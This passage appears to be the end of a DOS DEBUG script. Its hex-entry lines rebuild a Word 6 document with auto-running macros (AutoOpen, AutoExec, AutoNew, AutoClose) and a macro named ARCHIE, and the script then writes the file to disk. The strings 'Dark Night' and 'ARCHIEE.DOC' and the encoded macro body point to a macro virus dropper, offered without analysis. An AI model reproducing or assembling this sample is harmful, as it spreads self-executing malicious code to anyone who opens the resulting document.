E 1800 90 E9 E8 8B CB E4 E3 E4 FE E5 94 E9 97 96 DF DE 
E 1810 BA C5 B7 DA 93 9F 97 90 BA F2 F3 F4 B7 D9 98 B7 
E 1820 B0 B7 AD B6 EC BA BA FD B7 DF B7 D2 B2 DF DE FA 
E 1830 B9 69 5E DB B2 DE DE CC B2 DE DE D8 BA 8C C3 B9 
E 1840 66 5E DB B7 DF B7 CC B2 DE DE CC B2 DE DE D8 D2 
E 1850 B4 D8 9F AC BD B6 B7 BB C0 BA B1 DC B7 D4 88 97 
E 1860 B0 AD AA BF B2 B2 BB BA D2 B2 DF DE BA 8C C4 C3 
E 1870 BA F8 B7 DF B7 BA BA C3 B7 D4 88 97 B0 AD AA BF 
E 1880 B2 B2 BB BA D2 B2 DF DE C0 BA 8C F4 B7 D8 98 B7 
E 1890 B0 B7 AD B6 BA FE BA 8C F2 F3 C6 F8 BA 8C B9 1C 
E 18A0 5E B9 FB 5E DB D8 D9 B4 D9 E4 9F AC BD B6 B7 BB 
E 18B0 CC B4 D3 99 B2 B1 BC BF B2 E4 9F AC BD B6 B7 BB 
E 18C0 BA 8C B9 1C 5E B9 FB 5E DB D8 D9 B4 D6 E4 9F AB 
E 18D0 AA B1 90 BB A9 CC B4 D0 99 B2 B1 BC BF B2 E4 9F 
E 18E0 AB AA B1 90 BB A9 CC B2 DF DE BA 8C B9 1C 5E B9 
E 18F0 FB 5E DB D8 D9 B4 D4 E4 9F AB AA B1 9D B2 B1 AD 
E 1900 BB CC B4 CE 99 B2 B1 BC BF B2 E4 9F AB AA B1 9D 
E 1910 B2 B1 AD BB CC B2 DF DE BA 8C B9 1C 5E B9 FB 5E 
E 1920 DB D8 D9 B4 D7 E4 9F AB AA B1 9B A6 BB BD CC B4 
E 1930 D1 99 B2 B1 BC BF B2 E4 9F AB AA B1 9B A6 BB BD 
E 1940 CC B2 DF DE BA 8C B9 1C 5E B9 FB 5E DB D8 D9 B4 
E 1950 D7 E4 9F AB AA B1 91 AE BB B0 CC B4 D1 99 B2 B1 
E 1960 BC BF B2 E4 9F AB AA B1 91 AE BB B0 CC B2 DF DE 
E 1970 BA C4 C3 BA BB D9 98 B7 B0 B7 AD B6 EC C7 BA F2 
E 1980 F3 F4 B7 D8 98 B7 B0 B7 AD B6 BA BA FD B7 DF B7 
E 1990 D2 B2 DF DE FA B9 69 5E DB B2 DF DE CC B2 DE DE 
E 19A0 D8 BA 8C C3 B9 66 5E DB B7 DF B7 CC B2 DF DE CC 
E 19B0 B2 DF DE D8 D2 B4 D8 9F AC BD B6 B7 BB C0 BA B1 
E 19C0 DC B7 D4 88 97 B0 AD AA BF B2 B2 BB BA D2 B2 DF 
E 19D0 DE BA 8C C4 C3 BA F8 B7 DF B7 BA BA C3 B7 D4 88 
E 19E0 97 B0 AD AA BF B2 B2 BB BA D2 B2 DF DE C0 BA 8C 
E 19F0 F4 B7 D8 98 B7 B0 B7 AD B6 BA FE BA 8C F2 F3 C6 
E 1A00 F8 BA 8C B9 8A DE AD 15 DE D2 B2 DF DE BA 8C B9 
E 1A10 1C 5E B9 FB 5E DB D8 D9 B4 D9 E4 9F AC BD B6 B7 
E 1A20 BB CC B4 D3 99 B2 B1 BC BF B2 E4 9F AC BD B6 B7 
E 1A30 BB BA 8C B9 1C 5E B9 FB 5E DB D8 D9 B4 D6 E4 9F 
E 1A40 AB AA B1 90 BB A9 CC B4 D0 99 B2 B1 BC BF B2 E4 
E 1A50 9F AB AA B1 90 BB A9 CC B2 DF DE BA 8C B9 1C 5E 
E 1A60 B9 FB 5E DB D8 D9 B4 D4 E4 9F AB AA B1 9D B2 B1 
E 1A70 AD BB CC B4 CE 99 B2 B1 BC BF B2 E4 9F AB AA B1 
E 1A80 9D B2 B1 AD BB CC B2 DF DE BA 8C B9 1C 5E B9 FB 
E 1A90 5E DB D8 D9 B4 D7 E4 9F AB AA B1 9B A6 BB BD CC 
E 1AA0 B4 D1 99 B2 B1 BC BF B2 E4 9F AB AA B1 9B A6 BB 
E 1AB0 BD CC B2 DF DE BA 8C B9 1C 5E B9 FB 5E DB D8 D9 
E 1AC0 B4 D7 E4 9F AB AA B1 91 AE BB B0 CC B4 D1 99 B2 
E 1AD0 B1 BC BF B2 E4 9F AB AA B1 91 AE BB B0 CC B2 DF 
E 1AE0 DE BA 8C B9 7D 5E B2 DF DE CC B2 DE DE BA C4 C3 
E 1AF0 BA BB D8 98 B7 B0 B7 AD B6 C7 BA C4 C5 83 82 E6 
E 1B00 99 EB 86 CF C3 CB CC E6 E6 AB EB 8A C3 F7 F6 ED 
E 1B10 CD F2 E7 EC E6 E6 98 99 CE CF AB D4 A6 CB 82 8E 
E 1B20 86 81 AB E3 E2 E5 A6 C9 89 A6 A1 A6 BC A7 AB AB 
E 1B30 EC A6 CE A6 C3 A3 CE CF EB A8 78 4F CA A3 CE CF 
E 1B40 DD A3 CF CF C9 AB 9D D2 A8 77 4F CA A6 CE A6 DD 
E 1B50 A3 CE CF DD A3 CE CF C9 C3 A5 C9 8E BD AC A7 A6 
E 1B60 AA D1 AB A0 CD A6 C5 99 86 A1 BC BB AE A3 A3 AA 
E 1B70 AB C3 A3 CE CF AB 9D D5 D2 AB E9 A6 CE A6 AB AB 
E 1B80 D2 A6 C5 99 86 A1 BC BB AE A3 A3 AA AB C3 A3 CE 
E 1B90 CF D1 AB 9D E5 A6 C9 89 A6 A1 A6 BC A7 AB EF AB 
E 1BA0 9D E3 E2 D7 E9 AB 9D A8 9B CF BC 04 CF C3 A3 CE 
E 1BB0 CF AB 9D A8 0D 4F A5 C0 88 A3 A0 AD AE A3 F5 8E 
E 1BC0 BA BB A0 80 BF AA A1 DD A8 EA 4F CA C9 C8 A5 C6 
E 1BD0 F5 8E BA BB A0 80 BF AA A1 DD A3 CE CF AB 9D A8 
E 1BE0 0D 4F A5 C2 88 A3 A0 AD AE A3 F5 8E BD AC A7 A6 
E 1BF0 AA DD A8 EA 4F CA C9 C8 A5 C8 F5 8E BD AC A7 A6 
E 1C00 AA AB 9D A8 0D 4F A5 C0 88 A3 A0 AD AE A3 F5 8E 
E 1C10 BA BB A0 8A B7 AA AC DD A8 EA 4F CA C9 C8 A5 C6 
E 1C20 F5 8E BA BB A0 8A B7 AA AC DD A3 CE CF AB 9D A8 
E 1C30 0D 4F A5 C1 88 A3 A0 AD AE A3 F5 8E BA BB A0 81 
E 1C40 AA B8 DD A8 EA 4F CA C9 C8 A5 C7 F5 8E BA BB A0 
E 1C50 81 AA B8 DD A3 CE CF AB 9D A8 0D 4F A5 DF 88 A3 
E 1C60 A0 AD AE A3 F5 8E BA BB A0 8C A3 A0 BC AA DD A8 
E 1C70 EA 4F CA C9 C8 A5 C5 F5 8E BA BB A0 8C A3 A0 BC 
E 1C80 AA DD A3 CE CF AB 9D A8 6C 4F A3 CE CF DD A3 CF 
E 1C90 CF AB D5 D2 AB AA C9 89 A6 A1 A6 BC A7 D6 AB D5 
E 1CA0 D4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1CB0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1CC0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1CD0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1CE0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1CF0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1D00 00 03 00 00 01 03 00 00 A1 09 00 00 00 FE 00 00 
E 1D10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1D20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1D30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1D40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1D50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1D60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1D70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1D80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1D90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1DA0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1DB0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1DC0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1DD0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1DE0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1DF0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1E00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1E10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1E20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1E30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1E40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1E50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1E60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1E70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1E80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1E90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1EA0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1EB0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1EC0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1ED0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1EE0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1EF0 00 00 00 00 00 00 00 00 00 00 00 00 02 75 01 02 
E 1F00 00 03 00 00 01 03 00 00 FE 00 00 00 00 00 00 00 
E 1F10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1F20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1F30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1F40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1F50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1F60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1F70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1F80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1F90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1FA0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1FB0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1FC0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1FD0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1FE0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 1FF0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 2000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 2010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 2020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 2030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 2040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 2050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 2060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 2070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 2080 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 2090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 20A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 20B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 20C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 20D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 20E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 20F0 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 01 
E 2100 0E 00 0F 00 08 00 01 00 4B 00 0F 00 00 00 00 00 
E 2110 1A 00 00 40 F1 FF 02 00 1A 00 06 4E 6F 72 6D 61 
E 2120 6C 00 02 00 00 00 03 00 61 09 08 00 00 00 00 00 
E 2130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 00 
E 2140 41 40 F2 FF A1 00 22 00 16 44 65 66 61 75 6C 74 
E 2150 20 50 61 72 61 67 72 61 70 68 20 46 6F 6E 74 00 
E 2160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 
E 2170 00 00 04 00 01 03 00 00 00 00 FF FF FF FF 00 03 
E 2180 00 00 A1 09 00 00 05 00 00 03 00 00 01 03 00 00 
E 2190 06 00 4D 00 0A 44 61 72 6B 20 4E 69 67 68 74 0B 
E 21A0 43 3A 5C 44 4F 43 36 2E 44 4F 43 0A 44 61 72 6B 
E 21B0 20 4E 69 67 68 74 28 43 3A 5C 57 49 4E 41 50 50 
E 21C0 53 5C 4D 53 4F 46 46 49 43 45 5C 57 49 4E 57 4F 
E 21D0 52 44 36 5C 41 52 43 48 49 45 45 2E 44 4F 43 FF 
E 21E0 01 05 00 55 00 00 00 01 00 FF FF 6A 08 00 00 70 
E 21F0 00 00 00 02 00 00 00 09 03 00 00 55 8D 01 00 03 
E 2200 00 FF FF DA 08 00 00 95 01 00 00 02 00 00 00 79 
E 2210 03 00 00 55 DE 02 00 00 00 FF FF 6F 0A 00 00 EF 
E 2220 02 00 00 02 00 00 00 0E 05 00 00 55 82 06 00 02 
E 2230 00 FF FF 5E 0D 00 00 1B 00 00 00 02 00 00 00 FD 
E 2240 07 00 00 55 CF 07 00 04 00 FF FF 79 0D 00 00 89 
E 2250 01 00 00 02 00 00 00 18 08 00 00 10 37 00 08 41 
E 2260 75 74 6F 4F 70 65 6E 01 00 06 41 72 63 68 69 65 
E 2270 01 00 08 41 75 74 6F 45 78 65 63 01 00 07 41 75 
E 2280 74 6F 4E 65 77 01 00 09 41 75 74 6F 43 6C 6F 73 
E 2290 65 01 00 11 05 00 00 00 06 41 52 43 48 49 45 00 
E 22A0 01 00 07 41 55 54 4F 4E 45 57 00 06 00 08 41 55 
E 22B0 54 4F 45 58 45 43 00 02 00 08 41 55 54 4F 4F 50 
E 22C0 45 4E 00 07 00 09 41 55 54 4F 43 4C 4F 53 45 00 
E 22D0 40 43 61 6E 6F 6E 20 20 42 4A 43 2D 34 31 30 30 
E 22E0 00 4C 50 54 31 3A 00 43 41 4E 4F 4E 42 4A 00 43 
E 22F0 61 6E 6F 6E 20 20 42 4A 43 2D 34 31 30 30 00 00 
E 2300 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 2310 04 00 01 94 00 6E 00 0F 0E 80 01 01 00 01 00 EA 
E 2320 0A 6F 08 64 00 01 00 07 00 68 01 02 00 00 00 68 
E 2330 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 2340 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 2350 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 2360 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 01 
E 2370 01 00 00 01 00 00 00 01 00 00 00 00 00 00 00 00 
E 2380 00 00 00 18 00 00 00 00 00 00 00 00 00 01 00 00 
E 2390 00 00 00 00 00 00 00 00 00 0B 00 43 61 6E 6F 6E 
E 23A0 20 20 42 4A 43 2D 34 31 30 30 00 00 00 00 00 00 
E 23B0 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 
E 23C0 00 6F 08 EA 0A 6F 08 EA 0A 6F 08 EA 0A 00 00 00 
E 23D0 00 18 00 00 00 00 00 00 00 01 00 34 21 00 00 F8 
E 23E0 2A 00 00 40 00 1E 00 40 1F 6E 29 00 00 00 00 00 
E 23F0 00 43 61 6E 6F 6E 20 20 42 4A 43 2D 34 31 30 30 
E 2400 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 2410 00 00 04 00 01 94 00 6E 00 0F 0E 80 01 01 00 01 
E 2420 00 EA 0A 6F 08 64 00 01 00 07 00 68 01 02 00 00 
E 2430 00 68 01 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 2440 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 2450 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 2460 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 
E 2470 00 01 01 00 00 01 00 00 00 01 00 00 00 00 00 00 
E 2480 00 00 00 00 00 18 00 00 00 00 00 00 00 00 00 01 
E 2490 00 00 00 00 00 00 00 00 00 00 00 0B 00 43 61 6E 
E 24A0 6F 6E 20 20 42 4A 43 2D 34 31 30 30 00 00 00 00 
E 24B0 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 
E 24C0 00 00 00 6F 08 EA 0A 6F 08 EA 0A 6F 08 EA 0A 00 
E 24D0 00 00 00 18 00 00 00 00 00 00 00 01 00 34 21 00 
E 24E0 00 F8 2A 00 00 40 00 1E 00 40 1F 6E 29 00 00 00 
E 24F0 00 00 00 02 80 01 00 00 00 00 00 00 00 00 00 08 
E 2500 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 2510 00 31 00 15 16 90 01 00 00 54 69 6D 65 73 20 4E 
E 2520 65 77 20 52 6F 6D 61 6E 00 0C 16 90 01 02 00 53 
E 2530 79 6D 62 6F 6C 00 0B 26 90 01 00 00 41 72 69 61 
E 2540 6C 00 22 00 04 00 01 08 88 18 00 00 D0 02 00 00 
E 2550 68 01 00 00 00 00 DE 1B 01 66 DE 1B 01 66 00 00 
E 2560 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 2570 00 00 00 00 00 00 04 00 83 10 00 00 00 00 00 00 
E 2580 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 2590 00 00 00 00 24 03 28 00 00 00 00 00 00 00 0A 44 
E 25A0 61 72 6B 20 4E 69 67 68 74 0A 44 61 72 6B 20 4E 
E 25B0 69 67 68 74 00 00 00 00 00 00 00 00 00 00 00 00 
E 25C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 25D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 25E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 25F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 2600 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 2610 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 2620 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 2630 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 2640 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 2650 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 2660 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 2670 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 2680 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 2690 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 26A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 26B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 26C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 26D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 26E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 26F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
RCX
2600
W
Q
--------------------------------------------_END_------------------------------------------------